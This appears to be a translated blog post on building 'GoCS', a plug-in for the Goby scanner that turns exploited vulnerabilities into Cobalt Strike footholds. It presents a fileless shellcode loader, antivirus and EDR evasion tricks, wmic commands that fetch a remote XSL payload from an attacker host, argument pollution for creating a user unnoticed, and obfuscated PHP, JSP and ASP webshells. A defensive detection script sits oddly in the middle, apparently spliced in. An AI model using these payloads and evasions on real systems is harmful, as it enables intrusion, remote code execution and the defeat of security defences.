Goby can scan assets quickly and accurately and present the results visually. Since the last EXP plan, the number of PoCs and EXPs has also grown considerably. After a real vulnerability scan, exploiting a high-risk vulnerability should not stop at `whoami` but move on to the post-exploitation stage. For Windows targets, bringing a Cobalt Strike (CS) beacon online is an essential step that makes post-exploitation much easier. This plug-in uses only a simple method to bring CS online; I hope more experienced readers can offer ideas and suggestions to improve it. The source code carries detailed comments so that it can be understood quickly.


0x01 Plug-in

1.1 Plug-in effect

1.2 Usage

1. In the toolbar, import the 32-bit raw payload file generated by CS (Attacks -> Packages -> Payload Generator -> Output: Raw, a .bin file) and upload the generated evasion file to the VPS.

2. Set the URL of the evasion file on the VPS in the Goby plug-in configuration; it can be changed at any time.

3. Click GoCS on the exploit details page.

4. Select an exploitation mode and a file format, and adjust the payload to the actual situation to get past interception.

5. Click GO to send the request.

Note: it is not possible to show this plug-in only for Windows targets, so you need to judge the target's operating system yourself.


0x02 Plug-in development

2.1 Main structure

```text
├─ src
│  ├─ images/CS        // *.png screenshots
│  ├─ assets/layui     // layui front-end library
│  ├─ extension.js     // plug-in source
│  ├─ gopass.html      // toolbar page that builds the evasion XSL file
│  └─ GoCS.html
├─ package.json        // plug-in configuration manifest
└─ node_modules        // imported modules
```

2.2 The grandparent: package.json

Most of the work is done by the toolbar's gopass.html and the vulnerability page's index.html, so I will start with a brief introduction to their grandparent, package.json.

2.3 The parent: extension.js

The detailed comments are in the source code, which can be found under `\Extensions` in the Goby root directory after downloading GoCS in Goby. Modules are imported with `let fs = require('fs');`, or with a `parent.` prefix when the code runs in a child page.


To pop up gopass.html, click the GoPass command:

```javascript
// Register the GoPass command, triggered by clicking the toolbar icon
goby.registerCommand('GoPass', function (content) {
    let path = __dirname + "/gopass.html";
    // Open the sub page and set its width and height
    goby.showIframeDia(path, "GoPass", "666", "500");
});
// End: toolbar icon click
```

Code for sending the request and calling the EXP:

```javascript
// Gexp wraps the Goby HTTP API: fetch PoC information and fire the EXP
class Gexp {
    constructor() {
        this.fs = require('fs');
        this.request = require('request');
        this.path = require('path');
    }

    // Load the Goby server address and credentials
    init() {
        this.data = this.getServerInfo();
        this.host = this.data.server_host;
        this.port = this.data.server_port;
        this.username = this.data.authUsername;
        this.password = this.data.authPassword;
    }

    // Read Goby's own config/config.json
    getServerInfo() {
        let config_info = this.path.join(__dirname, '../../../config/config.json');
        this.data = JSON.parse(this.fs.readFileSync(config_info, 'utf-8'));
        return this.data;
    }

    // Fetch the PoC parameters for a vulnerability by name
    getPOCInfo(vulname, proxystr) {
        this.init();
        return new Promise((resolve, reject) => {
            this.request({
                url: `http://${this.host}:${this.port}/api/v1/getPOCInfo`,
                method: 'POST',
                auth: { 'user': this.username, 'pass': this.password },
                proxy: proxystr,
                json: { "vulname": vulname }
            }, function (error, response, body) {
                if (!error && response.statusCode == 200) {
                    resolve(body);
                } else {
                    reject(error);
                }
            });
        });
    }

    // Send the exploit request with the modified PoC data
    debugExp(post_data, proxystr) {
        this.init();
        return new Promise((resolve, reject) => {
            this.request({
                url: `http://${this.host}:${this.port}/api/v1/debugExp`,
                method: 'POST',
                auth: { 'user': this.username, 'pass': this.password },
                proxy: proxystr,
                json: post_data
            }, function (error, response, body) {
                if (!error && response.statusCode == 200) {
                    // Returned content, e.g. console.log(body);
                    resolve(body);
                } else {
                    reject(error);
                }
            });
        });
    }
}
// End of the Gexp class
```

2.4 The children

2.4.1 gopass.html generates the evasion XSL file

The main job of this file is to base64-encode the bin file and splice it into an XSL template, producing a gopass.xsl file for remote loading later.

The XSL file uses CactusTorch as the loader for the shellcode, and wmic executes it remotely without writing anything to disk. Because a fileless loader runs inside an existing process, while traditional security software relies on file-based detection, fileless loaders are currently detected poorly, which is why the plug-in brings CS online this way.

The XSL file inserts `<!-- -->` comment markers as a simple evasion trick, which only gets past basic antivirus engines.

The same is done for the important function names.

Only static evasion is discussed here; the result on VT is as follows.

The result is not good enough, so more `<!-- -->` comments are added. Like the P graph, the more P, the more… With the bypass above applied, the detection result is as follows.

The remaining detections seem to be based on executing the file: changing just one letter to upper case so that the code no longer runs makes them stop flagging it, so the evasion still needs strengthening later.


2.4.2 index.html generates the CS payload for vulnerability exploitation

This file mainly calls the Gexp class from extension.js, obtains the PoC parameters, modifies them, and then calls the EXP to send the request. There are RCE and Upload modes, and three file formats, PHP, ASP and JSP (ASPX will be added later); the details are commented in the source code.

Because this is a child page, `parent` must be prefixed when importing modules:

```javascript
let fs = parent.require('fs');
let goby = parent.goby;
```

Also, if you use exec to call cmd and goby.exe, the generated file ends up in Goby's root directory; the same applies to writing files without specifying a directory.

If this is your first time writing JavaScript, note that the drop-down box cannot be listened to with native events; use the layui syntax for select events instead.

```javascript
layui.use(['form'], function () {
    var form = layui.form;
    // Drop-down box change events start (layui event syntax)
    form.on('select(vlul)', function (data) {
        // Update the contents of the textarea
        changeE();
    });
    form.on('select(TXT)', function (data) {
        // Update the contents of the textarea
        changeE();
    });
    // Drop-down box change events end
});
// End of select event listening
```

Taking PHP as an example: the Upload exploit uploads and writes PHP code that calls cmd to run wmic, which loads and runs the shellcode remotely. RCE by default executes system commands directly, again calling wmic to load and run the shellcode remotely (for a code-execution vulnerability you also need to wrap it in a command function such as system()):

```bat
wmic OS get /format:"http://yourIP/a.xsl"
```

Unsurprisingly, this is certainly blocked by the "whole family bucket" suite, so the interception has to be bypassed; first try the well-worn echo plus pipe operator `|`:

```bat
echo OS get /format:"http://yourIP/a.xsl" | wmic
```

Local cmd execution is not blocked, but Upload is blocked when the command is written into the page and the page is then loaded. No surprise. The interesting part is that it is bypassed, but not completely. On the theory that premium ingredients often only need simple cooking, I cooked it simply: write the command into a .bat file and run it locally. In the end, the whole family bucket did not intercept it at all. So instead of calling wmic from the page, write it to a .bat and run wmic locally, and it is not intercepted.

So the final command is:

```bat
echo echo OS get /format:"http://yourIP/a.xsl" ^| wmic >> 1.bat && 1.bat
```
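From the defender's side, the three command forms above (direct wmic, echo piped into wmic, and the echo wrapped into a .bat) share one stable indicator: a `/format:` argument that points at a remote URL. The following detection logic is an added example, not part of the original post or the GoCS plug-in; it runs over constructed process command lines (the IP 192.0.2.10 is a placeholder from the documentation range) and flags each variant separately so an analyst can see which wrapping was used.

```python
import re
from typing import List, Dict

# Constructed sample process-creation command lines (not real telemetry):
# the three wmic /format variants described above plus benign wmic usage.
SAMPLE_EVENTS = [
    'cmd.exe /c wmic OS get /format:"http://192.0.2.10/a.xsl"',
    'cmd.exe /c echo OS get /format:"http://192.0.2.10/a.xsl" | wmic',
    'cmd.exe /c echo echo OS get /format:"http://192.0.2.10/a.xsl" ^| wmic >> 1.bat && 1.bat',
    'wmic.exe os get caption,version /format:list',
    'wmic.exe process list brief /format:csv',
    'cmd.exe /c 1.bat',
]

# /format: followed (after optional quote/whitespace) by a URL scheme. wmic fetches the
# stylesheet and runs script embedded in it, so the remote path is the key indicator,
# not the presence of wmic itself (local formats such as list/csv are normal).
REMOTE_FORMAT = re.compile(r'/format\s*:\s*["\']?\s*(?:https?|ftp)://', re.IGNORECASE)
# "echo ... | wmic" feeds the query through stdin; ^| is the batch-escaped pipe.
ECHO_PIPE = re.compile(r'\becho\b.*\^?\|\s*wmic\b', re.IGNORECASE)
# A line appended to a .bat file that is then executed in the same command.
BAT_WRAP = re.compile(r'>>\s*\S+\.bat\s*&&\s*\S+\.bat', re.IGNORECASE)


def classify(cmdline: str) -> List[str]:
    """Return the indicator names matched by one command line (empty if benign)."""
    hits = []
    lowered = cmdline.lower()
    if REMOTE_FORMAT.search(cmdline):
        hits.append('wmic_remote_xsl')
    if ECHO_PIPE.search(cmdline) and 'get /format' in lowered:
        hits.append('echo_pipe_to_wmic')
    if BAT_WRAP.search(cmdline) and 'wmic' in lowered:
        hits.append('bat_wrapped_wmic')
    return hits


def scan(events: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious command line to its indicators; benign lines are dropped."""
    return {e: h for e in events if (h := classify(e))}


if __name__ == '__main__':
    for cmd, indicators in scan(SAMPLE_EVENTS).items():
        print(', '.join(indicators), '<-', cmd)
```

The `.bat` wrapper only hides the command from whatever inspects the web request or the page; the process that finally runs is still `wmic.exe` with a remote `/format:` argument, so process-creation telemetry sees all three variants alike.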

Finally, let's see what it looks like when the shellcode runs, under the watch of a "sky", a "bucket", a "butler" and a "pile".

After six seconds without a response I thought some "sky" had killed it, but it had not. If you perform sensitive operations, such as creating a user, consider polluting the arguments with argue.

Reference: www.freesion.com/article/334…

Argument pollution for net:

```text
argue net xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
```

View the polluted arguments:

```text
argue
```

Performing a sensitive operation with the polluted net:

```text
execute net user test2 root123 /add
```

The whole family bucket did not intercept it.

The principle is simply as shown in the diagram: originally net is executed, but after pollution the command line appears as net XXXXXXXXXX, which bypasses the check.

You are bound to run into minor issues, such as wmic loading from a port that is not open.

The best solution is to leave it alone and wait a minute for it to exit. The lesson here: make sure the port is opened in the firewall settings.

After bypassing with the cmd command, on to bypassing the upload webshell.

PHP uses a PHP statement based on the Ice Scorpion (Behinder) callback function:

```javascript
let phpshell = "<?php @call_user_func(base64_decode('c3lzdGVta'),'" + wmicCMDshell + "');";
```

JSP references the article by yzddMr6 (yzddMr6.tk/posts/websh…):

```javascript
let jspshell = '<%@ page contentType="text/html; charset=UTF-8" import="javax.xml.bind.DatatypeConverter" language="java" %>'
    + '<%Class rt = Class.forName(new String(DatatypeConverter.parseHexBinary("6a6176612e6c616e672e52756e74696d65"))); '
    + 'Process e = (Process) rt.getMethod(new String(DatatypeConverter.parseHexBinary("65786563")), String.class)'
    + '.invoke(rt.getMethod(new String(DatatypeConverter.parseHexBinary("67657452756e74696d65"))).invoke(null), "'
    + wmicCMDshell + '"); %>';
```

ASP simply uses Chr characters to write it, which does not evade detection; I hope an ASP expert can offer guidance.

```javascript
let aspshell = '<%response.write server.createobject("wscript.sh"&Chr(69)&"ll").ExEc("' + wmicAsp + '").stdout.readall%>';
```


0x03 Summary

This was my first time writing a plug-in and writing a JS file, and it was without doubt Baidu-oriented programming, but overall it went well and I learned a lot. Unfortunately, ASP does not evade detection, and I hope an ASP expert can offer guidance. This version is very basic and easy to use, so it is only suitable for simple environments. Hopefully more elements will be added later so that the plug-in fits more complex environments.


If you need related learning materials, feel free to message me privately!